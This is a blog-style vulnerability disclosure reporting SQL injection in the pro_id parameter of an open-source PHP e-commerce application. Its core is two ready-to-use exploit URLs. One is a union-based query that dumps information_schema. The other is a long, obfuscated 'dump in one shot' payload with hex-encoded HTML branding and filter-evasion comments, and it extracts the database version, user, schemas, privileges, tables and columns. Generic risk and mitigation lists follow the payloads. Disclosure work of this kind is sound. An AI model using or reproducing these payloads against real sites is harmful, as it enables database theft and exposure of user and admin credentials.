Header Ads Widget

E-commerce 1.0 | details.php?pro_id= SQL Injection | Found By Maloy Roy Orko

March 02, 2025

Hi All, 


I am Maloy Roy Orko.

Recently in one of my pentest research, I found an Ecommerce-Website-using-PHP, Bootstrap4, Html5, Css3 By SHAHID AFRIDI ZIHAD which is an open source E-commerce application using native PHP.

Curious to explore its functionalities, I downloaded and set it up in my local system. 

After fiddling with the source code, I found that it did not have any kind of SQL Injection protection.

It can lead into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.

The Main Thing Is : if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too.Thats why I am trying to inform everyone about this.

Title of the Vulnerability: E-commerce 1.0 | details.php?pro_id= SQL Injection | Found By Maloy Roy Orko  

Vulnerability Class: SQL Injection

Product Name: E-commerce 1.0

Vendor: https://github.com/s-a-zhd/

Vulnerable Product Link: 

https://github.com/s-a-zhd/Ecommerce-Website-using-PHP

Technical Details & Description: The application source code is coded in a way which allows SQL Injection. This leads into mass user data in risk and database leaks can be happened by hackers too and admin panel credentials were in risk too.


Product & Service Introduction: Ecommerce-Website-using-PHP, Bootstrap4, Html5, Css3

Observation & Exploitation: 

Let's see the source code?     

File: details.php



You can see that there is no defense or filter against SQL Injection.Normally They are getting IDS and then fetching data From Database According to it.

So Lets See ,How I exploited It? What is the exploitable parameter here?

That is: details.php?pro_id=

Lets Take a example and then see the exploit use here!

Vulnerable Place :

http://192.168.0.100:8080/ecom/details.php?pro_id=17

So,Lets see an approach and the result?



My Exploit For This Information Discolsure:

http://192.168.0.100:8080/ecom/details.php?pro_id=17'AND+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2),12--+


Lets see an approach to exploit SQL INJECTION again:


The Exploit I Used: 

http://192.168.0.100:8080/ecom/details.php?pro_id=17'AND+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,/*!50000concat/**Darknet-Haxor**/*/(0x223e273e3c2f7469746c653e,0x3c6c696e6b2072656c3d227374796c6573686565742220687265663d2268747470733a2f2f646576656c6f706d656e742e67756172646972616e2e6f72672f7075626c69632f6f6666696369616c2d6465666163652d706167652f646570656e64656e636965732f6373732f726f6f742e6373732220747970653d22746578742f637373223e,0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2232223e3c74686561643e3c74723e3c746820636f6c7370616e3d2232223e3c6469762069643d2267756172646972616e2d6c6f676f223e3c696d6720647261676761626c653d2266616c736522207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d756939795f376b6a5a51512f5836356f51356d4d5a34492f41414141414141414144412f45374e7a42316e686270516e314a316d4e474f58335a783857744a537250354177434c63424741735948512f733332302f32303230313131335f3137303032382e706e67222077696474683d323030206865696768743d32303020616c743d2244616b726e6574204861786f72205465616d223e3c2f6469763e3c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e3c683320616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d22726564223e496e6a656374656420627920,0x4d616c6f7920526f79204f726b6f,0x3c2f68333e3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d7265643e56657273696f6e202d2d3e203c666f6e7420636f6c6f723d626c75653e,/*!50000VerSiOn/**xnxx**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d7265643e55736572202d2d3e203c666f6e7420636f6c6f723d626c75653e,/*!50000UsEr/**Darknet-Haxor**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d7265643e4461746162617365202d2d3e203c666f6e7420636f6c6f723d626c75653e,/*!50000DaTabaSe/**Darknet-Haxor**/*/(),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e546f74616c2044617461626173653c2f74723e3c2f74683e3c74723e3c746820636f6c7370616e3d2232223e,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**xnxx**/*/(@w:=0x00) ,(SeLECT(@w)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000InFOrMATIoN_SChEmA/**Darknet-Haxor**/*/.SCheMaTA)/*!50000WhErE/**Darknet-Haxor**/*/(@w)IN(@w:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@w,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e,/*!50000sCheMa_NaMe/**Darknet-Haxor**/*/,0x3c62723e))))w),0x3c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e557365722050726976696c6567653c2f74683e3c2f74723e3c74723e3c746820636f6c7370616e3d2232223e,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000SeLECT/**xnxx**/*/(@z:=0x00) ,(SeLECT(@z)/*!50000FrOM/**Darknet-Haxor**/*/(/*!50000INFOrmATiON_SChEmA/**Darknet-Haxor**/*/.UsER_PRIViLEgES)/*!50000WhERE/**Darknet-Haxor**/*/(@z)IN(@z:=/*!50000CoNCaT/**Darknet-Haxor**/*/(0x20,@z,0x3c64697620616c69676e3d226c656674223e3c666f6e7420636f6c6f723d626c75653e,GrANtEE,0x202d3e20,Is_gRANTaBLE,0x3c62723e))))z),0x3c2f74683e3c2f74723e,0x3c74723e3c746820636f6c7370616e3d2232223e3c64697620616c69676e3d2263656e746572223e3c696d6720647261676761626c653d2266616c736522207372633d2268747470733a2f2f7261772e67697468756275736572636f6e74656e742e636f6d2f6461726b6e65746861786f722f706963747572652f6d61696e2f6c6f676f2e676966222077696474683d343630206865696768743d363020616c743d2244616b726e6574204861786f72205465616d223e3c2f74683e3c2f74723e3c74723e3c74683e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e5461626c65204e616d653c2f74683e3c74683e3c64697620616c69676e3d2263656e746572223e3c666f6e7420636f6c6f723d7265643e436f6c756d6e204e616d653c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(selEct(@x)/*!50000fRom/**Darknet-Haxor**/*/(/*!50000sElect/**Darknet-Haxor**/*/(@x:=0x00),(sElect(0)/*!From/**Darknet-Haxor**/*/(/*!50000inforMation_schEma.coLuMns/**Darknet-Haxor**/*/)/*!50000Where/**Darknet-Haxor**/*/(taBle_schema=/*!50000DatAbase/**Darknet-Haxor**/*/())and(0x00)in(@x:=/*!50000coNcat/**Darknet-Haxor**/*/(@x,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000tAble_naMe/**Darknet-Haxor**/*/,0x3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e,0x3c64697620616c69676e3d226c656674223e,/*!50000colUmn_naMe/**Darknet-Haxor**/*/,0x3c2f666f6e743e3c2f74643e3c2f74723e))))x)),12--+


Guess What ?

It is clearly a SQL Injection Vulnerability 

Risks of SQL Injection

  1. Data Breach: Attackers can gain unauthorized access to sensitive data, including personal information, financial records, and confidential business information.
  2. Data Manipulation: Attackers can modify, delete, or insert data into the database, leading to data integrity issues and loss of critical information.
  3. Authentication Bypass: SQL injection can allow attackers to bypass authentication mechanisms, gaining unauthorized access to user accounts or administrative functions.
  4. Remote Code Execution: In some cases, SQL injection can lead to the execution of arbitrary code on the server, allowing attackers to take control of the server.
  5. Denial of Service (DoS): Attackers can exploit SQL injection to execute heavy queries that can slow down or crash the database.
  6. Privilege Escalation: Attackers can exploit SQL injection to gain higher privileges than intended, allowing them to perform actions that should be restricted.
  7. Data Exfiltration: Attackers can extract large volumes of data from the database, which can be used for identity theft, fraud, or sold on the dark web.
  8. Reputation Damage: Organizations that suffer from SQL injection attacks may face reputational damage, loss of customer trust, and potential legal consequences.

Impacts of SQL Injection

  1. Financial Loss: The costs associated with a data breach can be significant, including legal fees, regulatory fines, and costs related to remediation and recovery.
  2. Legal Consequences: Organizations may face lawsuits or regulatory penalties for failing to protect sensitive data, especially if they are subject to data protection regulations (e.g., GDPR, HIPAA).
  3. Operational Disruption: A successful SQL injection attack can disrupt business operations, leading to downtime and loss of productivity.
  4. Loss of Intellectual Property: Attackers may gain access to proprietary information, trade secrets, or other intellectual property, which can be detrimental to a business's competitive advantage.
  5. Increased Security Costs: Organizations may need to invest in enhanced security measures, such as application firewalls, security audits, and employee training, to prevent future attacks.
  6. Customer Trust Erosion: Customers may lose trust in an organization that has experienced a data breach, leading to decreased customer loyalty and potential loss of business.

Mitigation Strategies

To mitigate the risks associated with SQL injection, organizations should implement the following strategies:

  1. Parameterized Queries: Use prepared statements and parameterized queries to ensure that user input is treated as data, not executable code.
  2. Input Validation: Validate and sanitize all user inputs to ensure they conform to expected formats and types.
  3. Least Privilege Principle: Limit database user permissions to the minimum necessary for application functionality.
  4. Web Application Firewalls (WAF): Deploy WAFs to help detect and block SQL injection attempts.
  5. Regular Security Audits: Conduct regular security assessments and code reviews to identify and remediate vulnerabilities.
  6. Security Awareness Training: Educate developers and staff about secure coding practices and the risks associated with SQL injection.

Conclusion :- 


The main aim of this article is to show that if any NON-IT personal uses this template,he will fall into this vulnerability and his companies reputation can be lost too. But I also hope that it helps to give you ideas of how combining attacks can make them much more potent. 



Tags: